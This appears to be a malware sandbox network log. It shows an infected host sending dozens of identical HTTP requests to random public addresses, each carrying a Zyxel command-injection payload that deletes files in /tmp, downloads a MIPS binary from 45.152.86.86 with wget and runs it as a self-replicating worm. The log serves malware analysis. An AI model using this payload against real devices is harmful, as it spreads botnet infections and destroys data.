                                        Mar 31, 2024 09:21:08.758898973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3942192.168.2.234778223.58.174.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758954048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3943192.168.2.2348194103.146.73.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759021997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3944192.168.2.233467644.67.13.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759099960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3945192.168.2.2354314109.150.92.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759186983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3946192.168.2.2335068102.28.65.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759249926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3947192.168.2.2337696186.68.94.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759299040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3948192.168.2.235627035.253.5.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759397984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3949192.168.2.2338800120.109.255.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759453058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3950192.168.2.2337486153.90.1.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759537935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3951192.168.2.2357302181.93.246.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759592056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3952192.168.2.234380289.208.183.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759644032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3953192.168.2.2346830174.106.20.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759696960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3954192.168.2.2345276202.3.4.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759763956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3955192.168.2.2359600192.212.136.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759839058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3956192.168.2.235701657.15.118.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759915113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3957192.168.2.2353356159.124.17.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.759999037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3958192.168.2.2351426123.168.105.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760046959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3959192.168.2.2348192184.10.105.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760122061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3960192.168.2.2355082153.16.118.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760176897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3961192.168.2.2336286208.203.63.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760238886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3962192.168.2.234860073.81.21.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760284901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3963192.168.2.2346184138.49.70.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760355949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3964192.168.2.2339688139.56.18.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760418892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3965192.168.2.233472886.20.41.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760488987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3966192.168.2.2339008119.187.129.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760570049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3967192.168.2.235319835.190.236.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760654926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3968192.168.2.235019440.88.121.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760746002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3969192.168.2.235675299.146.116.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760802984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3970192.168.2.234710288.21.36.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760886908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3971192.168.2.2339858213.127.31.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.760935068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3972192.168.2.2336814152.75.2.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761002064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3973192.168.2.2349290179.50.9.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761058092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3974192.168.2.2360802155.60.39.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761123896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3975192.168.2.2351484112.51.223.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761212111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3976192.168.2.2352046121.59.139.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761257887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3977192.168.2.2350886160.218.206.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761331081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3978192.168.2.2356838205.186.205.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761426926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3979192.168.2.2353650173.145.139.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761473894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3980192.168.2.2345708158.2.179.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761523008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3981192.168.2.234892043.113.4.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761593103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3982192.168.2.2336636212.223.190.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761657000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3983192.168.2.2347168166.195.105.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761768103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3984192.168.2.2355118173.123.117.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761811018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3985192.168.2.234056852.20.44.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761872053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3986192.168.2.2357680178.235.104.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.761933088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3987192.168.2.234740414.233.151.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762008905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3988192.168.2.2339400222.131.224.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762061119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3989192.168.2.2336554174.16.150.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762149096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3990192.168.2.2351066128.209.172.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762204885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3991192.168.2.23587484.1.160.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762255907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3992192.168.2.235670051.245.70.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762339115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3993192.168.2.2358614160.77.97.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762387037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3994192.168.2.235098696.63.131.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762480021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3995192.168.2.235095825.52.172.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762547016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3996192.168.2.2340676221.65.35.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762595892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3997192.168.2.234605644.224.63.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762644053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3998192.168.2.235869094.184.233.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762706995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3999192.168.2.2345800115.180.160.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762763023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4000192.168.2.233517637.94.210.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.762850046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4001192.168.2.2349050118.231.64.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.772988081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4002192.168.2.2340032139.58.212.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773046970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4003192.168.2.2334492105.212.242.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773122072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4004192.168.2.235445481.2.72.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773174047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4005192.168.2.235409235.75.106.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773250103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4006192.168.2.23602401.133.152.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773297071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4007192.168.2.2359056193.176.191.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773396015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4008192.168.2.2349704202.237.216.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.773449898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4009192.168.2.235049213.199.44.9443
                                        TimestampBytes transferredDirectionData
